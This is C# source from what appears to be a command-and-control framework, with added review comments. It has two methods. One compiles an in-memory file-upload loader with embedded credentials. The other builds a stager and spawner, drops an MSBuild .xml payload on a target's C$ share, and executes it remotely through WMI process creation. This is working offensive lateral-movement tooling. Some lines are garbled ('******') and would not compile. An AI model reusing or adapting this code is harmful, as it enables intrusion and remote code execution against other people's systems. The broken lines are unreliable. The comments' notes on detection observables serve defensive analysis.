        /// <summary>
        /// Builds and dispatches a file-upload task for <c>agent</c>: the local file at
        /// <c>filepath</c> is gzip-compressed and base64-encoded, substituted together with the
        /// destination path/name and the supplied credentials into the
        /// <c>FILEUPLOAD_TEMPLATE</c> C# source, compiled in memory to "FileUpLoader.dll",
        /// compressed/encoded again and handed to <c>RunAssemblyBase64</c>.
        /// </summary>
        /// <remarks>
        /// Reads the instance fields <c>filepath</c>, <c>pathdest</c>, <c>filename</c>,
        /// <c>domain</c>, <c>username</c>, <c>password</c> and <c>agent</c>.
        /// Does nothing when <c>filepath</c> is empty or the file does not exist.
        /// Any exception raised while reading, templating or building is swallowed and replaced
        /// by a fixed console message, so the caller receives no failure signal.
        /// NOTE(review): <c>username</c> and <c>password</c> are fed into the template
        /// substitution, so the compiled loader presumably carries them as plain literals —
        /// relevant when such an artifact is recovered and analysed.
        /// </remarks>
        private void Run()
        {
            // Nothing to upload: no path given, or the local file is missing.
            if (string.IsNullOrEmpty(filepath) || !File.Exists(filepath))
            {
                return;
            }

            try
            {
                // File content as gzip + base64 text (presumably so it can be embedded in the template source).
                string filesrc = Convert.ToBase64String(CompressGZipAssembly(File.ReadAllBytes(filepath)));

                // Destination directory defaults to "."; backslashes are doubled because the
                // value is spliced into C# source text, not used directly as a path here.
                string destinationpath = ".";
                if (!string.IsNullOrEmpty(pathdest))
                {
                    destinationpath = pathdest.Replace("\\", "\\\\");
                }

                // Destination file name is optional; an empty string is passed through when absent.
                string destinationfilename = "";
                if (!string.IsNullOrEmpty(filename))
                {
                    destinationfilename = filename;
                }

                // Domain falls back to "." when none was supplied (meaning decided by the template — confirm there).
                string domainname = ".";
                if (!string.IsNullOrEmpty(domain))
                {
                    domainname = domain;
                }

                // Locate the .cs template under the workspace folder and substitute its placeholders.
                string folderrpath = Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, TEMPLATE_FOLDER);

                string source = File.ReadAllText(Path.Combine(folderrpath, FILEUPLOAD_TEMPLATE));
                source = Replacer.ReplaceFileUpLoad(source, filesrc, destinationpath, destinationfilename, username, password, domainname);

                // Compile the substituted source to an in-memory assembly named "FileUpLoader.dll",
                // then gzip + base64 it for transport. The meaning of the trailing 40 is not visible here.
                string assembly = Convert.ToBase64String(CompressGZipAssembly(Builder.BuidStreamAssembly(source, "FileUpLoader.dll", 40)));

                // Queue the loader on the agent with a single fixed argument.
                RunAssemblyBase64(assembly, "FileUpLoader", new string[] { "pippo" }, agent);
            }
            catch (Exception)
            {
                // Catch-all: the exception itself is discarded; only this fixed message is printed.
                Console.WriteLine("[*] Error creating task");
            }
        }
        /// <summary>
        /// Builds a stager for the selected listener profile and, when an <c>agent</c> is
        /// attached, chains three in-memory builds: the stager itself, a spawner that embeds
        /// the stager as shellcode and is wrapped by <c>MSBuildGenerator</c> into an .xml
        /// project text, and a file-upload loader that writes that .xml to
        /// <c>\\targethost\C$\Windows\temp</c>. Finally the agent is tasked to run SharpWMI
        /// (<c>action=create</c>) so that msbuild.exe executes the dropped .xml on the target.
        /// </summary>
        /// <remarks>
        /// Reads the instance fields <c>username</c>, <c>password</c>, <c>lhost</c>,
        /// <c>lport</c>, <c>lpipename</c>, <c>profile</c>, <c>domain</c>, <c>agent</c>,
        /// <c>taskname</c> and <c>targethost</c>.
        /// Returns silently when required fields are missing or the profile id is not
        /// registered with the C2 server. Failures are reported only as <c>e.Message</c> on the
        /// console. Detection-relevant observables visible in this method: the UNC drop path on
        /// the C$ share, the 64-bit .NET 4 msbuild.exe path and the WMI process-create call.
        /// </remarks>
        private void Run()
        {
            try
            {
                // Required: credentials, listener host, either a pipe name or a port >= 1, and a profile id >= 1.
                if (string.IsNullOrEmpty(username) || string.IsNullOrEmpty(password) || string.IsNullOrEmpty(lhost) || (string.IsNullOrEmpty(lpipename) && lport < 1) || profile < 1)
                {
                    return;
                }
                else
                {
                    // Locate the .cs templates under the workspace folder.
                    string folderrpath = Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, TEMPLATE_FOLDER);
                    // Only proceed for a profile id the C2 server knows about.
                    if (Program.GetC2Manager().GetC2Server().GetProfiles().ContainsKey(profile))
                    {
                        // Domain fallback "." is used only for the file-upload template below;
                        // the spawner template receives the raw `domain` field instead.
                        string domainname = ".";
                        if (!string.IsNullOrEmpty(domain))
                        {
                            domainname = domain;
                        }

                        string source = File.ReadAllText(Path.Combine(folderrpath, STAGER_TEMPLATE));

                        // NOTE(review): the guard above tests IsNullOrEmpty(lpipename) but this
                        // branch tests == null, so an empty (non-null) pipe name takes the named-pipe path.
                        if (lpipename == null)
                        {
                            // HTTP listener config (no pivot): host + port + the selected profile.
                            ListenerConfig conf = new ListenerConfig("", lhost, lport, Program.GetC2Manager().GetC2Server().GetProfile(profile), profile);
                            source = Replacer.ReplaceAgentProfile(source, RedPeanut.Program.GetServerKey(), 40, conf);
                        }
                        else
                        {
                            // Named-pipe pivot listener config: host + pipe name + the selected profile.
                            ListenerPivotConfig conf = new ListenerPivotConfig("", lhost, lpipename, Program.GetC2Manager().GetC2Server().GetProfile(profile));
                            source = Replacer.ReplaceAgentProfile(source, RedPeanut.Program.GetServerKey(), 40, conf);
                        }

                        // Compile the stager to an assembly with a random .dll name, then gzip + base64 it.
                        // A fresh Random instance is created for every name generated in this method.
                        string stagerstr = Convert.ToBase64String(CompressGZipAssembly(Builder.BuidStreamAssembly(source, RandomAString(10, new Random()) + ".dll", 40)));

                        // With an agent attached, build the spawner and the delivery chain.
                        if (agent != null)
                        {
                            // Spawner template: #NUTCLR# receives the gzip+base64 shellcode generated from the
                            // stager (entry "RedPeanutRP"/"Main"); #SPAWN# comes from the profile.
                            // #DOMAIN# gets the raw `domain` field — a null value removes the placeholder
                            // (string.Replace treats a null replacement as empty), unlike `domainname` below.
                            source = File.ReadAllText(Path.Combine(folderrpath, SPAWNER_TEMPLATE))
                                     .Replace("#NUTCLR#", Convert.ToBase64String(CompressGZipAssembly(Builder.GenerateShellcode(stagerstr, RandomString(10, new Random()) + ".exe", "RedPeanutRP", "Main", new string[] { "" }))))
                                     .Replace("#SPAWN#", Program.GetC2Manager().GetC2Server().GetProfile(profile).Spawn)
                                     .Replace("#USERNAME#", username)
                                     .Replace("#PASSWORD#", password)
                                     .Replace("#DOMAIN#", domain);

                            // Compile the spawner to a randomly named assembly, gzip + base64.
                            string spawner = Convert.ToBase64String(CompressGZipAssembly(Builder.BuidStreamAssembly(source, RandomAString(10, new Random()) + ".dll", 40)));

                            // Wrap the spawner into MSBuild project text; #{taskname} is the only extra substitution.
                            Dictionary <string, string> msbuildargs = new Dictionary <string, string>();
                            msbuildargs.Add("#{taskname}", taskname);

                            MSBuildGenerator gen = new MSBuildGenerator(spawner, msbuildargs);

                            // Drop location on the target: the C$ administrative share, Windows\temp,
                            // with a random lowercase .xml file name.
                            string pathdest = string.Format(@"\\{0}\C$\Windows\temp", targethost);
                            string filename = RandomAString(10, new Random()).ToLower() + ".xml";
                            // Encoding.Default is platform-dependent (system ANSI code page on .NET Framework).
                            string filesrc  = Convert.ToBase64String(CompressGZipAssembly(Encoding.Default.GetBytes(gen.GetScriptText())));

                            // NOTE(review): destinattionfull is computed but never used.
                            string destinattionfull = pathdest.TrimEnd('\\') + @"\" + filename;

                            // Both guards below are always true here (pathdest and filename were just
                            // assigned non-empty values); they mirror the stand-alone upload command.
                            // Backslashes are doubled because the path is spliced into C# source text.
                            string destinationpath = ".";
                            if (!string.IsNullOrEmpty(pathdest))
                            {
                                destinationpath = pathdest.Replace("\\", "\\\\");
                            }

                            string destinationfilename = "";
                            if (!string.IsNullOrEmpty(filename))
                            {
                                destinationfilename = filename;
                            }

                            // Parse the file-upload .cs template and substitute its placeholders
                            // (including the credentials, which therefore end up in the compiled loader).
                            source = File.ReadAllText(Path.Combine(folderrpath, FILEUPLOAD_TEMPLATE));
                            source = Replacer.ReplaceFileUpLoad(source, filesrc, destinationpath, destinationfilename, username, password, domainname);

                            string assembly = Convert.ToBase64String(CompressGZipAssembly(Builder.BuidStreamAssembly(source, "FileUpLoader.dll", 40)));

                            // Task the agent to copy the .xml to the target host.
                            RunAssemblyBase64(assembly, "FileUpLoader", new string[] { "pippo" }, agent);

                            // Task the agent to start msbuild.exe on the target via WMI process create.
                            // NOTE(review): the next two lines appear garbled in this listing ("******")
                            // and would not compile as shown; they are kept verbatim here.
                            // The command points at the 64-bit .NET 4 msbuild.exe and the dropped .xml in C:\Windows\temp.
                            List <string> args = new List <string>();
                            args.Add("action=create");
                            args.Add("computername=" + targethost);
                            args.Add("username="******"\\" + username);
                            args.Add("password="******"command=C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\msbuild.exe C:\\Windows\\temp\\" + destinationfilename);

                            // Echoes every argument, concatenated without separators, to the console —
                            // this includes the username= and password= entries.
                            string s = "";
                            foreach (string ss in args.ToArray())
                            {
                                s += ss;
                            }
                            Console.WriteLine("String command: " + s);
                            RunAssembly(PL_MODULE_SHARPWMI, "SharpWMI.Program", args.ToArray(), agent);
                        }
                    }
                }
            } catch (Exception e)
            {
                // Catch-all: only the message is reported; the exception type and stack are dropped.
                Console.WriteLine("[*] Error running task build {0}", e.Message);
            }
        }